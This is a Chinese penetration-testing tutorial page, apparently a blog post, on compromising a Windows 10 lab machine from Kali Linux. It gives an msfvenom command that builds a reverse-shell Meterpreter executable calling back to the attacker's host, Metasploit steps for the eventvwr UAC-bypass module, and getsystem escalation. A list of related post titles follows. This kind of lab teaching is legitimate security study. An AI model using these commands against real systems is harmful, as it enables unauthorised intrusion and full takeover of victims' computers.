Kali Linux渗透测试——入侵Windows10
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。
一、metasploit对windows10入侵测试
攻击机:Kali Linux 2020 IP:192.168.xxx.xxx
靶机:Windows10 IP:192.168.xxx.xxx
1.生成exe文件,在目标主机打开
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=1000 -f exe -o met.exe
2.设置payload,设置本地IP和监听端口
3.运行入侵测试,并获得基础的shell
二、输入background隐藏此界面,然后进一步提权
msf5> use exploit/windows/local/bypassuac_eventvwr
msf5 exploit(bypassuac) > set session 3
msf5 exploit(bypassuac) > exploit
然会生成另一个session,可以进行提权操作了,提权过程中并不需要设置端口号了,默认4444即可
1.输入命令gesystem提取,第一次getuid,显示普通用户权限,第二次是系统权限
2.获得shell之后,敲入dir命令乱码显示,只要输入chcp 65001,解决了问题
Kali Linux渗透测试——入侵Windows10相关推荐
- 基于Android设备的Kali Linux渗透测试教程第1章渗透测试
基于Android设备的Kali Linux渗透测试教程第1章渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击者所采用的技术与方法,攻击目标系统的安全控制措施,并取得访问 ...
- 《Kali Linux渗透测试的艺术》—第2章2.3节安全测试方法论
本节书摘来自异步社区<Kali Linux渗透测试的艺术>一书中的第2章2.3节安全测试方法论,作者[英]Lee Allen , [印尼]Tedi Heriyanto , [英]Shake ...
- 视频教程-Kali Linux渗透测试全程课与脚本语言编程系列课程-渗透测试
Kali Linux渗透测试全程课与脚本语言编程系列课程 本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥899.00 立即订 ...
- Kali Linux渗透测试——MSF基础篇
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 Metasploit是目前最流行.最强大.最具扩展性的渗透测试平台,一定程度上统一了渗透测试和漏洞研究的工作环境,使得新的攻击代码比 ...
- 视频教程-Kali Linux渗透测试基础入门到进阶实战全程课-渗透测试
Kali Linux渗透测试基础入门到进阶实战全程课 本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥499.00 立即订阅 ...
- kali linux 渗透测试学习笔记——被动信息收集
kali linux 渗透测试学习笔记--linux 被动信息收集 被动信息收集 被动信息收集 公开渠道可获得的信息 已公开的信息,通过互联网等渠道去获得 与目标系统不产生直接交互 不对目标访问,扫描 ...
- Kali Linux渗透测试——信息收集
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 渗透测试标准(PTES:http://www.pentest-standard.org)的七个阶段: 1.前期交互阶段:讨论确定渗透 ...
- 《Kali Linux渗透测试的艺术》—8章8.7节本章总结
本节书摘来自异步社区<Kali Linux渗透测试的艺术>一书中的8章8.7节本章总结,作者[英]Lee Allen , [印尼]Tedi Heriyanto , [英]Shakeel A ...
- Kali Linux渗透测试 073 扫描工具-Vega
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 vega 简介 使用基本流程 扫描的基本使用 使用截 ...
最新文章
- [转载]Surging 分布式微服务框架使用入门
- Effective STL 为包含指针的关联容器指定比较类型
- Linux 空格转换行
- Be a new gentleman
- newman api
- 元素class属性中的空格
- 【学术相关】一个博士生接受怎样的训练是完整、全面的科研训练?
- 16F877A和24C02通信汇编语言,pic单片机IIC通信读24C02程序例 16F877A 主频4M
- CompletableFuture 异步编程
- MySQL--timestamp类型字段的CURRENT_TIMESTAMP与ON UPDATE CURRENT_TIMESTAMP属性
- 大数据对人们的好处_大数据有什么作用和优势
- Django 模板中使用 Ajax POST
- jarsigner 命令对 apk 加密
- 桌面存放linux文件无法删除,电脑桌面文件无法删除怎么办?
- 怎么用计算机sinB=0.67,三角函数练习题(附详细解答过程)
- 36个excel技巧、50个快捷键
- matlab怎么求周期积分,Matlab中怎么求解积分
- Android之Keystore文件签名(获取查看apk签名)
- android进程通信6,[Android]你不知道的Android进程化(6)--进程通信Andromeda框架
- flutter doctor --android-licenses后Android sdkmanager not found.